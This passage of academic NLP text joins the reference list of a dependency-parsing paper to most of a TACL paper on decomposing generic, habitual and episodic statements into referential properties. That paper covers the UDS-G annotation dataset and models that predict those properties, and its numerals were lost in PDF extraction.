sampath kannan, mitch mar- cus, chris callison-burch, michael collins, mark liberman, ben taskar, joakim nivre, and the three anonymous reviewers for valuable comments on ear- lier versions of this material. references g. attardi. . experiments with a multilanguage non-projective dependency parser. in proceedings of conll, pages – . a. böhmová, j. hajič, e. hajičová, and b. hladká. . the prague dependency treebank: three-level anno- tation scenario. in anne abeillé, editor, treebanks: building and using syntactically annotated corpora, pages – . kluwer academic publishers. b. bohnet and j. kuhn. . the best of both worlds – a graph-based completion model for transition-based parsers. in proceedings of eacl, pages – . s. buchholz and e. marsi. . conll-x shared task on multilingual dependency parsing. in proceedings of conll, pages – . x. carreras. . experiments with a higher-order projective dependency parser. in proceedings of the conll shared task session of emnlp-conll, pages – . e. charniak and m. johnson. . coarse-to-fine n- best parsing and maxent discriminative reranking. in proceedings of acl, pages – . d. chiang. . hierarchical phrase-based translation. computational linguistics, ( ): – . m. de marneffe and c. manning. . stanford typed dependencies manual. j. eisner. . bilexical grammars and their cubic- time parsing algorithms. in harry bunt and anton nijholt, editors, advances in probabilistic and other parsing technologies, pages – . kluwer academic publishers. c. gómez-rodrı́guez and j. nivre. . a transition- based parser for -planar dependency structures. in proceedings of acl, pages – . c. gómez-rodrı́guez, j. carroll, and d. weir. . de- pendency parsing schemata and mildly non-projective dependency parsing. computational linguistics, ( ): – . k. hall. . k-best spanning tree parsing. in proceed- ings of acl, pages – . r. johansson and p. nugues. . extended constituent-to-dependency conversion for english. in proceedings of the th nordic conference on com- putational linguistics (nodalida), pages – . t. koo and m. collins. . efficient third-order de- pendency parsers. in proceedings of acl, pages – . t. koo, a. m. rush, m. collins, t. jaakkola, and d. son- tag. . dual decomposition for parsing with non- projective head automata. in proceedings of emnlp, pages – . t. koo. . advances in discriminative dependency parsing. ph.d. thesis, massachusetts institute of tech- nology. s. kübler, r. mcdonald, and j. nivre. . depen- dency parsing. synthesis lectures on human lan- guage technologies, ( ): – . m. p. marcus, m. a. marcinkiewicz, and b. santorini. . building a large annotated corpus of en- glish: the penn treebank. computational linguistics, ( ): – . a. f. t. martins, n. a. smith, and e. p. xing. . concise integer linear programming formulations for dependency parsing. in proceedings of acl, pages – . a. martins, m. almeida, and n. a. smith. . turn- ing on the turbo: fast third-order non-projective turbo parsers. in proceedings of acl (short papers), pages – . r. mcdonald and f. pereira. . online learning of approximate dependency parsing algorithms. in pro- ceedings of eacl, pages – . r. mcdonald and g. satta. . on the complexity of non-projective data-driven dependency parsing. in proceedings of the th international conference on parsing technologies, pages – . r. mcdonald, f. pereira, k. ribarov, and j. hajič. . non-projective dependency parsing using span- ning tree algorithms. in proceedings of hlt/emnlp, pages – . i. mel’čuk. . dependency syntax: theory and practice. state university of new york press. j. nivre and j. nilsson. . pseudo-projective depen- dency parsing. in proceedings of acl, pages – . j. nivre, j. hall, s. kübler, r. mcdonald, j. nilsson, s. riedel, and d. yuret. . the conll shared task on dependency parsing. in proceedings of the conll shared task session of emnlp-conll, pages – . j. nivre. . an efficient algorithm for projective de- pendency parsing. in proceedings of the th interna- tional workshop on parsing technologies, pages – . j. nivre. . incrementality in deterministic depen- dency parsing. in proceedings of the workshop on in- cremental parsing: bringing engineering and cogni- tion together, pages – . j. nivre. . non-projective dependency parsing in expected linear time. in proceedings of acl, pages – . e. pitler, s. kannan, and m. marcus. . dynamic programming for higher order parsing of gap-minding trees. in proceedings of emnlp, pages – . e. pitler, s. kannan, and m. marcus. . find- ing optimal -endpoint-crossing trees. transac- tions of the association for computational linguistics, (mar): – . a. rush and s. petrov. . vine pruning for effi- cient multi-pass dependency parsing. in proceedings of naacl, pages – . g. satta and m. kuhlmann. . efficient parsing for head-split dependency trees. transactions of the as- sociation for computational linguistics, (july): – . d. a. smith and j. eisner. . dependency parsing by belief propagation. in proceedings of emnlp, pages – . d. weiss and b. taskar. . structured prediction cascades. in aistats, pages – . d. zeman, d. mareček, m. popel, l. ramasamy, j. štěpánek, z. žabokrtský, and j. hajič. . ham- ledt: to parse or not to parse? in proceedings of the eight international conference on language re- sources and evaluation (lrec’ ), pages – . h. zhang and r. mcdonald. . generalized higher- order dependency parsing with cube pruning. in pro- ceedings of emnlp, pages – . y. zhang and j. nivre. . transition-based depen- dency parsing with rich non-local features. in pro- ceedings of acl (short papers), pages – . decomposing generalization models of generic, habitual, and episodic statements venkata govindarajan university of rochester benjamin van durme johns hopkins university aaron steven white university of rochester abstract we present a novel semantic framework for modeling linguistic expressions of generalization— generic, habitual, and episodic statements—as combinations of simple, real-valued referen- tial properties of predicates and their argu- ments. we use this framework to construct a dataset covering the entirety of the universal dependencies english web treebank. we use this dataset to probe the efficacy of type-level and token-level information—including hand- engineered features and static (glove) and contextual (elmo) word embeddings—for predicting expressions of generalization. introduction natural language allows us to convey not only information about particular individuals and events, as in example ( ), but also generalizations about those individuals and events, as in ( ). ( ) a. mary ate oatmeal for breakfast today. b. the students completed their assignments. ( ) a. mary eats oatmeal for breakfast. b. the students always complete their assign- ments on time. this capacity for expressing generalization is extremely flexible—allowing for generalizations about the kinds of events that particular individuals are habitually involved in, as in ( ), as well as characterizations about kinds of things, as in ( ). ( ) a. bishops move diagonally. b. soap is used to remove dirt. such distinctions between episodic statements ( ), on the one hand, and habitual ( ) and generic (or characterizing) statements ( ), on the other, have a long history in both the linguistics and artificial intelligence literatures (see carlson, ; maienborn et al., ; leslie and lerner, ). nevertheless, few modern semantic parsers make a systematic distinction (cf. abzianidze and bos, ). this is problematic, because the ability to accurately capture different modes of generaliza- tion is likely key to building systems with robust common sense reasoning (zhang et al., a; bauer et al., ): such systems need some source for general knowledge about the world (mccarthy, , , ; minsky, ; schank and abelson, ; hobbs et al., ; reiter, ) and natural language text seems like a prime candidate. it is also surprising, because there is no dearth of data relevant to linguistic expressions of generalization (doddington et al., ; cybulska and vossen, b; friedrich et al., ). one obstacle to further progress on general- ization is that current frameworks tend to take standard descriptive categories as sharp classes— for example, episodic, generic, habitual for state- ments and kind, individual for noun phrases. this may seem reasonable for sentences like ( a), where mary clearly refers to a particular individual, or ( a), where bishops clearly refers to a kind; but natural text is less forgiving (grimm, , , ). consider the under- lined arguments in ( ): do they refer to kinds or individuals? ( ) a. i will manage client expectations. b. the atmosphere may not be for everyone. c. thanks again for great customer service! to remedy this, we propose a novel frame- work for capturing linguistic expressions of generalization. taking inspiration from decompo- sitional semantics (reisinger et al., ; white et al., ), we suggest that linguistic expressions transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: christopher potts. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://doi.org/ . /tacl_a_ of generalization should be captured in a contin- uous multi-label system, rather than a multi-class system. we do this by decomposing categories such as episodic, habitual, and generic into simple referential properties of predicates and their argu- ments. using this framework (§ ), we develop an annotation protocol, which we validate (§ ) and compare against previous frameworks (§ ). we then deploy this framework (§ ) to construct a new large-scale dataset of annotations covering the entire universal dependencies (de marneffe et al., ; nivre et al., ) english web treebank (ud-ewt; bies et al., ; silveira et al., )—yielding the universal decompo- sitional semantics-genericity (uds-g) dataset. through exploratory analysis of this dataset, we demonstrate that this multi-label framework is well-motivated (§ ). we then present models for predicting expressions of linguistic general- ization that combine hand-engineered type and token-level features with static and contextual learned representations (§ ). we find that (i) referential properties of arguments are easier to predict than those of predicates; and that (ii) contextual learned representations contain most of the relevant information for both arguments and predicates (§ ). background most existing annotation frameworks aim to cap- ture expressions of linguistic generalization using multi-class annotation schemes. we argue that this reliance on multi-class annotation schemes is problematic on the basis of descriptive and theoretical work in the linguistics literature. one of the earliest frameworks explicitly aimed at capturing expressions of linguistic general- ization was developed under the ace- program (mitchell et al., ; doddington et al., , and see reiter and frank, ). this framework associates entity mentions with discrete labels for whether they refer to a specific member of the set in question (specific) or any member of the set in question (generic). the ace- multilingual training corpus (walker et al., ) extends these annotation guidelines, providing two additional classes: (i) negatively quantified entries (neg) for referring to empty sets and (ii) data, code, protocol implementation, and task instruc- tions provided to annotators are available at decomp.io. underspecified entries (usp), where the referent is ambiguous between generic and specific. the existence of the usp label already portends an issue with multi-class annotation schemes, which have no way of capturing the well-known phenomena of taxonomic reference (see carlson and pelletier, , and references therein), abstract/event reference (grimm, , , ), and weak definites (carlson et al., ). for example, wines in ( ) refers to particular kinds of wine; service in ( ) refers to an abstract entity/event that could be construed as both particular-referring, in that it is the service at a specific restaurant, and kind-referring, in that it encompasses all service events at that restaurant; and bus in ( ) refers to potentially multiple distinct buses that are grouped into a kind by the fact that they drive a particular line. ( ) that vintner makes three different wines. ( ) the service at that restaurant is excellent. ( ) that bureaucrat takes the bus to work. this deficit is remedied to some extent in the arrau (poesio et al., , and see mathew, ; louis and nenkova, ) and ecb+ (cybulska and vossen, a,b) corpora. the arrau corpus is mainly intended to capture anaphora resolution, but following the gnome guidelines (poesio, ), it also annotates entity mentions for a generic attribute, sensitive to whether the mention is in the scope of a relevant semantic operator (e.g., a conditional or quantifier) and whether the nominal refers to a type of object whose genericity is left underspecified, such as a substance. the ecb+ corpus is an extension of the eventcorefbank (ecb; bejan and harabagiu, ; lee et al., ), which annotates google news texts for event coreference in accordance with the timeml specification (pustejovsky et al., ), and is an improvement in the sense that, in addition to entity mentions, event mentions may be labeled with a generic class. the ecb+ approach is useful, since episodic, habitual, and generic statements can straightfor- wardly be described using combinations of event and entity mention labels. for example, in ecb+, episodic statements involve only non-generic entity and event mentions; habitual statements involve a generic event mention and at least one downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://decomp.io non-generic entity mention; and generic state- ments involve generic event mentions and at least one generic entity mention. this demonstrates the strength of decomposing statements into proper- ties of the events and entities they describe; but there remain difficult issues arising from the fact that the decomposition does not go far enough. one is that, like ace- / and arrau, ecb+ does not make it possible to capture taxonomic and abstract reference or weak definites; another is that, because ecb+ treats generics as mutu- ally exclusive from other event classes, it is not possible to capture that events and states in those classes can themselves be particular or generic. this is well known for different classes of events, such as those determined by a predicate’s lex- ical aspect (vendler, ); but it is likely also important for distinguishing more particular stage- level properties (e.g., availability ( )) from more generic individual-level properties (e.g., strength ( )) (carlson, ). ( ) those firemen are available. ( ) those firemen are strong. this situation is improved upon in the richer event descriptions (red; o’gorman et al., ) and situation entities (sitent; friedrich and palmer, a,b; friedrich et al., ; friedrich and pinkal, b,a; friedrich et al., ) frame- works, which annotate both nps and entire clauses for genericity. in particular, sitent, which is used to annotate masc (ide et al., ) and wikipedia, has the nice property that it rec- ognizes the existence of abstract entities and lexical aspectual class of clauses’ main verbs, along with habituality and genericity. this is use- ful because, in addition to decomposing state- ments using the genericity of the main referent and event, this framework recognizes that lexical as- pect is an independent phenomenon. in practice, however, the annotations produced by this frame- work are mapped into a multi-class scheme contain- ing only the high-level generic-habitual-episodic distinction—alongside a conceptually indepen- dent distinction among illocutionary acts. a potential argument in favor of mapping into a multi-class scheme is that, if it is sufficiently elaborated, the relevant decomposition may be recoverable. but regardless of such an elaboration, uncertainty about which class any particular entity or event falls into cannot be ignored. some ex- amples may just not have categorically correct answers; and even if they do, annotator uncertainty and bias may obscure them. to account for this, we develop a novel annotation framework that both (i) explicitly captures annotator confidence about the different referential properties discussed above and (ii) attempts to correct for annotator bias using standard psycholinguistic methods. annotation framework we divide our framework into two protocols—the argument and predicate protocols—that probe properties of individuals and situations (i.e., events or states) referred to in a clause. drawing inspiration from prior work in decompositional semantics (white et al., ), a crucial aspect of our framework is that (i) multiple properties can be simultaneously true for a particular individual or situation (event or state); and (ii) we explicitly collect confidence ratings for each property. this makes our framework highly extensible, because further properties can be added without breaking a strict multi-class ontology. drawing inspiration from the prior literature on generalization discussed in § and § , we focus on properties that lie along three main axes: whether a predicate or its arguments refer to (i) instantiated or spatiotemporally delimited (i.e., particular) situations or individuals; (ii) classes of situations (i.e., hypothetical situations) or kinds of individuals; and/or (iii) intangible (i.e., abstract concepts or stative situations). this choice of axes is aimed at allowing our framework to capture not only the standard episodic-habitual-generic distinction, but also phenomena that do not fit neatly into this dis- tinction, such as taxonomic reference, abstract reference, and weak definites. the idea here is similar to prior decompositional semantics work on semantic protoroles (reisinger et al., ; white et al., , ), which associates categories like agent or patient with sets of more basic properties, such as volitionality, causation, change-of-state, and so forth, and is similarly inspired by classic theoretical work (dowty, ). in our framework, prototypical episodics, habit- uals, and generics correspond to sets of properties that the referents of a clause’s head predicate and arguments have—namely, clausal categories are built up from properties of the predicates that head downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : examples of argument protocol (top) and predicate protocol (bottom). them along with those predicates’ arguments. for instance, prototypical episodic statements, like those in ( ), have arguments that only refer to particular, non-kind, non-abstract individuals and a predicate that refers to a particular event or (possibly) state; prototypical habitual statements, like those in ( ) have arguments that refer to at least one particular, non-kind, non-abstract individual and a predicate that refers to a non-particular, dynamic event; and prototypical generics, like those in ( ), have arguments that only refer to kinds of individuals and a predicate that refers to non-particular situations. it is important to note that these are all proto- typical properties of episodic, habitual, or generic statements, in the same way that volitionality is a prototypical property of agents and change-of- state is a prototypical property of patients. that is, our framework explicitly allows for bleed between categories because it only commits to the referen- tial properties, not the categories themselves. it is this ambivalence toward sharp categories that also allows our framework to capture phenomena that fall outside the bounds of the standard three-way distinction. for instance, taxonomic reference, as in ( ), and weak definites, as in ( ), prototypically involve an argument being both particular- and kind-referring; stage-level properties, as in ( ), prototypically involve particular, non-dynamic situations, while individual-level properties, as in ( ), prototypically involve non-particular, non- dynamic situations. figure shows examples of the argument pro- tocol (top) and predicate protocol (bottom), whose implementation is based on the event factuality annotation protocol described by white et al. ( ) and rudinger et al. ( ). annotators are presented with a sentence with one or many words highlighted, followed by statements pertain- ing to the highlighted words in the context of the sentence. they are then asked to fill in the statement with a binary response saying whether it does or does not hold and to give their confidence on a -point scale—not at all confident ( ), not very confident ( ), somewhat confident ( ), very confident ( ), and totally confident ( ). framework validation to demonstrate the efficacy of our framework for use in bulk annotation (reported in § ), we conduct a validation study on both our predicate and argument protocols. the aim of these studies is to establish that annotators display reasonable agreement when annotating for the properties in each protocol, relative to their reported confi- dence. we expect that, the more confident both annotators are in their annotation, the more likely it should be that annotators agree on those annotations. to ensure that the findings from our validation studies generalize to the bulk annotation setting, we simulate the bulk setting as closely as pos- sible: (i) randomly sampling arguments and pre- dicates for annotation from the same corpus we conduct the bulk annotation on ud-ewt; and (ii) allowing annotators to do as many or as few annotations as they would like. this design makes standard measures of interannotator agreement somewhat difficult to accurately compute, because different pairs of annotators may annotate only a small number of overlapping items (arguments/ predicates), so we turn to standard statistical methods from psycholinguistics to assist in esti- mation of interannotator agreement. predicate and argument extraction we ex- tracted predicates and their arguments from the gold ud parses from ud-ewt using predpatt (white et al., ; zhang et al., b). from the ud-ewt training set, we then randomly sampled arguments from those headed by a det, num, noun, propn, or pron and predicates from downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april those headed by a adj, noun, num, det, propn, pron, verb, or aux. annotators a total of annotators were re- cruited from amazon mechanical turk to anno- tate arguments; and annotators were recruited to annotate predicates. in both cases, arguments and predicates were presented in batches of , with each predicate and argument annotated by annotators. confidence normalization because different annotators use the confidence scale in different ways (e.g., some annotators use all five options while others only ever respond with totally confident ( )) we normalize the confidence ratings for each property using a standard ordinal scale normalization technique known as ridit scoring (agresti, ). in ridit scoring, ordinal labels are mapped to ( , ) using the empirical cumulative distribution function of the ratings given by each annotator. specifically, for the responses y(a) given by annotator a, ridity(a) ( y (a) i ) = ecdfy(a) ( y (a) i − ) + . × ecdfy(a) ( y (a) i ) . ridit scoring has the effect of reweighting the importance of a scale label based on the frequency with which it is used. for example, insofar as an annotator rarely uses extreme values, such as not at all confident or totally confident, the annotator is likely signaling very low or very high confidence, respectively, when they are used; and insofar as an annotator often uses extreme values, the annotator is likely not signaling particularly low or particularly high confidence. interannotator agreement (iaa) common iaa statistics, such as cohen’s or fleiss’ κ, rely on the ability to compute both an expected agreement pe and an observed agreement po, with κ ≡ po−pe −pe . such a computation is relatively straightforward when a small number of annotators annotate many items, but when many annotators each annotate a small number of items pairwise, pe and po can be difficult to estimate accurately, especially for annotators that only annotate a few items total. further, there is no standard way to incorporate confidence ratings, like the ones we collect, into these iaa measures. to overcome these obstacles, we use a com- bination of mixed and random effects models (gelman and hill, ), which are extremely common in the analysis of psycholinguistic data property β̂ σ̂ann σ̂item a rg um en t is.particular . . . is.kind − . . . is.abstract − . . . p re di ca te is.particular . . . is.dynamic . . . is.hypothetical − . . . table : bias (log-odds) for answering true. (baayen, ), to estimate pe and po for each property. the basic idea behind using these models is to allow our estimates of pe and po to be sensi- tive to the number of items annotators anno- tated as well as how annotators’ confidence relates to agreement. to estimate pe for each property, we fit a random effects logistic regression to the binary responses for that property, with random intercepts for both annotator and item. the fixed intercept estimate β̂ for this model is an estimate of the log-odds that the average annotator would answer true on that property for the average item; and the random intercepts give the distribution of actual annotator (σ̂ann) or item (σ̂item) biases. table gives the estimates for each property. we note a substantial amount of variability in the bias different annotators have for answering true on many of these properties. this variability is evidenced by the fact that σ̂ann and σ̂item are similar across properties, and it suggests the need to adjust for annotator biases when analyzing these data, which we do both here and for our bulk annotation. to compute pe from these estimates, we use a parametric bootstrap. on each replicate, we sample annotator biases b , b independently from n(β̂ , σ̂ann), then compute the expected probability of random agreement in the standard way: π π + ( − π )( − π ), where πi = logit− (bi). we compute the mean across , such replicates to obtain pe, shown in table . to estimate po for each property in a way that takes annotator confidence into account, we first compute, for each pair of annotators, each item they both annotated, and each property they annotated that item on, whether or not they agree in their annotation. we then fit separate mixed effects logistic regressions for each property to this agreement variable, with a fixed intercept β and slope βconf for the product of the annotators’ downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april property pe κlow κhigh a rg um en t is.particular . . . is.kind . . . is. abstract . . . p re di ca te is.particular . − . . is.dynamic . − . . is.hypothetical . − . . table : interannotator agreement scores. confidence for that item and random intercepts for both annotator and item. we find, for all properties, that there is a reliable increase (i.e., a positive β̂conf) in agreement as annotators’ confidence ratings go up (ps < . ). this corroborates our prediction that annotators should have higher agreement for things they are confident about. it also suggests the need to incorporate confidence ratings into the annotations our models are trained on, which we do in our normalization of the bulk annotation responses. from the fixed effects, we can obtain an esti- mate of the probability of agreement for the average pair of annotators at each confidence level between and . we compute two versions of κ based on such estimates: κlow, which corresponds to confidence for at least one annotator in a pair, and κhigh, which corresponds to perfect confidence for both. table shows these κ estimates. as implied by reliably positive β̂confs, we see that κhigh is greater than κlow for all properties. further, with the exception of dynamic, κhigh is generally comparable to the κ estimates reported in annotations by trained annotators using a multi-class framework. for instance, compare the metrics in table to κann in table (see § for details), which gives the fleiss’ κ metric for clause types in the sitent dataset (friedrich et al., ). comparison to standard ontology to demonstrate that our framework subsumes standard distinctions (e.g., episodic v. habitual v. generic) we conduct a study comparing anno- tations assigned under our multi-label framework to those assigned under a framework that recog- nizes such multi-class distinctions. we choose the the sitent framework for this comparison, because we use the product of annotator confidences because it is large when both annotators have high confidence and small when either annotator has low confidence and always remains between (lowest confidence) and (highest confidence). clause type p r f κmod κann eventive . . . . . stative . . . . . habitual . . . . . generic . . . . . table : predictability of standard ontology using our property set in a kernelized support vector classifier. it assumes a categorical distinction between generic, habitual (their generalizing), episodic (their eventive), and stative clauses (friedrich and palmer, a,b; friedrich et al., ; friedrich and pinkal, b,a; friedrich et al., ). sitent is also a useful comparison because it was constructed by highly trained annotators who had access to the entire document containing the clause being annotated, thus allowing us to assess both how much it matters that we use only very lightly trained annotators and do not provide document context. predicate and argument extraction for each of generic, habitual, stative, and eventive, we randomly sample clauses from sitent such that (i) that clause’s gold annotation has that category; and (ii) all sitent annotators agreed on that annotation. we annotate the mainrefer- ent of these clauses (as defined by sitent) in our argument protocol and the mainverb in our predicate protocol, providing annotators only the sentence containing the clause. annotators annotators were recruited from amazon mechanical turk to annotate arguments, and annotators were recruited to annotate predicates—both in batches of , with each predicate and argument annotated by annotators. annotation normalization as noted in § , different annotators use the confidence scale dif- ferently and have different biases for responding true or false on different properties (see table ). to adjust for these biases, we construct a nor- malized score for each predicate and argument using mixed effects logistic regressions. these mixed effects models all had (i) a hinge loss with margin set to the normalized confidence rating; (ii) fixed effects for property (particular, sitent additionally assumes three other classes, con- trasting with the four above: imperative, question, and report. we ignore clauses labeled with these categories. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april kind, and abstract for arguments; particular, hypothetical, and dynamic for predicates) token, and their interaction; and (iii) by-annotator ran- dom intercepts and random slopes for property with diagonal covariance matrices. the rationale behind (i) is that true should be associated with positive values; false should be associated with negative values; and the confidence rating should control how far from zero the normalized rating is, adjusting for the biases of annotators that responded to a particular item. the resulting re- sponse scale is analogous to current approaches to event factuality annotation (lee et al., ; stanovsky et al., ; rudinger et al., ). we obtain a normalized score from these models by setting the best linear unbiased pre- dictors for the by-annotator random effects to zero and using the best linear unbiased estimators for the fixed effects to obtain a real-valued label for each token on each property. this procedure amounts to estimating a label for each property and each token based on the ‘‘average annotator.’’ quantitative comparison to compare our anno- tations to the gold situation entity types from sitent, we train a support vector classifier with a radial basis function kernel to predict the situation entity type of each clause on the basis of the normalized argument property annotations for that clause’s mainreferent and the nor- malized predicate property annotations for that clause’s mainverb. the hyperparameters for this support vector classifier were selected using exhaustive grid search over the regularization parameter λ ∈ { , , , } and bandwidth σ ∈ { − , − , − , − } in a -fold cross- validation (cv). this -fold cv was nested within a -fold cv, from which we calculate metrics. table reports the precision, recall, and f-score computed using the held-out set in each fold of the -fold cv. for purposes of comparison, it also gives the fleiss’ κ reported by friedrich et al. ( ) for each property (κann) as well as cohen’s κ between our model predictions on the held-out folds and the gold sitent annotations (κmod). one way to think about κmod is that it tells us what agreement we would expect if we used our model as an annotator instead of highly trained humans. we see that our model’s agreement (κmod) tracks interannotator agreement (κann) surprisingly well. indeed, in some cases, such as for generic, our model’s agreement is within a few points of figure : mean property value for each clause type. interannotator agreement. this pattern is sur- prising, because our model is based on annota- tions by very lightly trained annotators who have access to very limited context compared with the annotators of sitent, who receive the entire doc- ument in which a clause is found. indeed, our model has access to even less context than it could otherwise have on the basis of our framework, since we only annotate one of the potentially many arguments occurring in a clause; thus, the metrics in table are likely somewhat conser- vative. this pattern may further suggest that, although having extra context for annotating com- plex semantic phenomena is always preferable, we still capture useful information by annotating only isolated sentences. qualitative comparison figure shows the mean normalized value for each property in our framework broken out by clause type. as ex- pected, we see that episodics tend to have particular-referring arguments and predicates, whereas generics tend to have kind-referring arguments and non-particular predicates. also as expected, episodics and habituals tend to refer to situations that are more dynamic than statives and generics. but although it makes sense that generics would be, on average, near zero for dynamicity—since generics can be about both dynamic and non-dynamic situations—it is less clear why statives are not more negative. this pattern may arise in some way from the fact that downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april there is relatively lower agreement on dynamicity, as noted in § . bulk annotation we use our annotation framework to collect anno- tations of predicates and arguments on ud-ewt using the predpatt system—thus yielding the uni- versal decompositional semantics–genericity (uds-g) dataset. using ud-ewt in conjunction with predpatt has two main advantages over other similar corpora: (i) ud-ewt contains text from multiple genres—not just newswire—with gold standard universal dependency parses; and (ii) there are now a wide variety of other semantic annotations on top of ud-ewt that use the predpatt standard (white et al., ; rudinger et al., ; vashishtha et al., ). predicate and argument extraction predpatt identifies , predicates and , arguments of those predicates from , sentences. based on analysis of the data from our validation study (§ ) and other pilot experiments (not reported here), we developed a set of heuristics for filtering certain tokens that predpatt identifies as predicates and arguments, either because we found that there was little variability in the label assigned to particular subsets of tokens—for example, pro- nominal arguments (such as i, we, he, she, etc.) are almost always labeled particular, non-kind, and non-abstract (with the exception of you and they, which can be kind-referring)—or because it is not generally possible to answer questions about those tokens (e.g., adverbial predicates are excluded). based on these filtering heuristics, we retain , arguments and , predicates for annotation. table compares these numbers against the resources described in § . annotators we recruited annotators from amazon mechanical turk to annotate arguments, and annotators were recruited to annotate predicates. arguments and predicates in the ud- ewt validation and test sets were annotated by three annotators each; and those in the ud- ewt train set were annotated by one each. all annotations were performed in batches of . annotation normalization we use the anno- tation normalization procedure described in § , fit separately to our train and development splits, on the one hand, and our test split, on the other. corpus level scheme size ace- np multi-class , ace- ecb+ arg. multi-class , pred. multi-class , cfd np multi-class , matthew et al clause multi-class , arrau np multi-class , sitent topic multi-class , clause multi-class red arg. multi-class , pred. multi-class , uds-g arg. multi-label , pred. multi-label , table : survey of genericity annotated corpora for english, including our new corpus (in bold). exploratory analysis before presenting models for predicting our prop- erties, we conduct an exploratory analysis to dem- onstrate that the properties of the dataset relate to other token- and type-level semantic properties in intuitive ways. figure plots the normalized ratings for the argument (left) and predicate (right) protocols. each point corresponds to a token and the density plots visualize the number of points in a region. arguments we see that arguments have a slight tendency (pearson correlation ρ=− . ) to refer to either a kind or a particular—for example, place in ( ) falls in the lower right quadrant (particular- referring) and transportation in ( ) falls in the upper left quadrant (kind-referring)—though there are a not insignificant number of arguments that refer to something that is both—for example, registration in ( ) falls in the upper right quadrant. ( ) i think this place is probably really great especially judging by the reviews on here. ( ) what made it perfect was that they offered transportation so that[...] ( ) some places do the registration right at the hospital[...] we also see that there is a slight tendency for arguments that are neither particular-referring (ρ = − . ) nor kind-referring (ρ = − . ) to be abstract-referring—for example, power in ( ) downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : distribution of normalized annotations in argument (left) and predicate (right) protocols. falls in the lower left quadrant (only abstract- referring)—but that there are some arguments that refer to abstract particulars and some that refer to abstract kinds—for example, both reputation ( ) and argument ( ) are abstract, but reputation falls in the lower right quadrant, while argument falls in the upper left. ( ) power be where power lies. ( ) meanwhile, his reputation seems to be improving, although bangs noted a ‘‘pretty interesting social dynamic.’’ ( ) the pew researchers tried to transcend the economic argument. predicates we see that there is effectively no tendency (ρ = . ) for predicates that refer to particular situations to refer to dynamic events— for example, faxed in ( ) falls in the upper right quadrant (particular- and dynamic-referring), while available in ( ) falls in the lower right quadrant (particular- and non-dynamic-referring). ( ) i have faxed to you the form of bond[...] ( ) is gare montparnasse storage still available? but we do see that there is a slight tendency (ρ = − . ) for predicates that are hypothetical- referring not to be particular-referring—for ex- ample, knows in ( a) and do in ( b) are hypotheticals in the lower left. ( ) a. who knows what the future might hold, and it might be expensive? b. i have tryed to give him water but he wont take it...what should i do? models we consider two forms of predicate and argument representations to predict the three attributes in our framework: hand-engineered features and learned features. for both, we contrast both type-level information and token-level information. hand-engineered features we consider five sets of type-level hand-engineered features. . concreteness concreteness ratings for root argument lemmas in the argument protocol from the concreteness database (brysbaert et al., ) and the mean, maximum, and minimum concreteness rating of a predicate’s arguments in the predicate protocol. . eventivity eventivity and stativity ratings for the root predicate lemma in the predicate protocol and the predicate head of the root argument in the argument protocol from the lcs database (dorr, ). . verbnet verb classes from verbnet (schuler, ) for root predicate lemmas. . framenet frames evoked by root predicate lemmas in the predicate protocol and for both downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april the root argument lemma and its predicate head in the argument protocol from framenet (baker et al., ). . wordnet the union of wordnet (fellbaum, ) supersenses (ciaramita and johnson, ) for all wordnet senses the root argument or predicate lemmas can have. and we consider two sets of token-level hand- engineered features. . syntactic features pos tags, ud morpho- logical features, and governing dependencies were extracted using predpatt for the predi- cate/argument root and all of its dependents. . lexical features function words (determin- ers, modals, auxiliaries) in the dependents of the arguments and predicates. learned features for our type-level learned features, we use the b uncased glove embed- dings for the root of the annotated predicate or argument (pennington et al., ). for our token- level learned features, we use , -dimensional elmo embeddings (peters et al., ). to obtain the latter, the ud-ewt sentences are passed as input to the elmo three-layered bilm, and we extract the output of all three hidden layers for the root of the annotated predicates and arguments, giving us , -dimensional vectors for each. labeling models for each protocol, we predict the three normalized properties corresponding to the annotated token(s) using different subsets of the above features. the feature representation is used as the input to a multilayer perceptron with relu nonlinearity and l loss. the number of hidden layers and their sizes are hyperparameters that we tune on the development set. implementation for all experiments, we use stochastic gradient descent to train the multilayer perceptron parameters with the adam optimizer (kingma and ba, ), using the default learning rate in pytorch ( − ). we performed ablation experiments on the four major classes of features discussed above. hyperparameters for each of the ablation ex- periments, we ran a hyperparameter grid search over hidden layer sizes (one or two hidden layers with sizes h , h ∈ { , , , , }; h at most half of h ), l regularization penalty l ∈ { , − , − , − } , and the dropout probability d ∈ { . , . , . , . , . }. development for all models, we train for at most epochs with early stopping. at the end of each epoch, the l loss is calculated on the development set, and if it is higher than the pre- vious epoch, we stop training, saving the param- eter values from the previous epoch. evaluation consonant with work in event fac- tuality prediction, we report pearson correlation (ρ) and proportion of mean absolute error (mae) explained by the model, which we refer to as r on analogy with the variance explained r = ρ . r = − maepmodel maepbaseline where maepbaseline is always guessing the median for property p. we calculate r across properties (wr ) by taking the mean r weighted by the mae for each property. these metrics together are useful, because ρ tells us how similar the predictions are to the true values, ignoring scale, and r tells us how close the predictions are to the true values, after accounting for variability in the data. we focus mainly on differences in relative performance among our models, but for comparison, state- of-the-art event factuality prediction systems obtain ρ ≈ . and r ≈ . for predicting event factuality on the predicates we annotate (rudinger et al., ). results table contains the results on the test set for both the argument (top) and predicate (bottom) protocols. we see that (i) our models are generally better able to predict referential properties of arguments than those of predicates; (ii) for both predicates and arguments, contextual learned repre- sentations contain most of the relevant information for both arguments and predicates, though the addition of hand-engineered features can give a slight performance boost, particularly for the predicate properties; and (iii) the proportion of absolute error explained is significantly lower than what we might expect from the variance explained implied by the correlations. we discuss (i) and (ii) here, deferring discussion of (iii) to § . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april feature sets 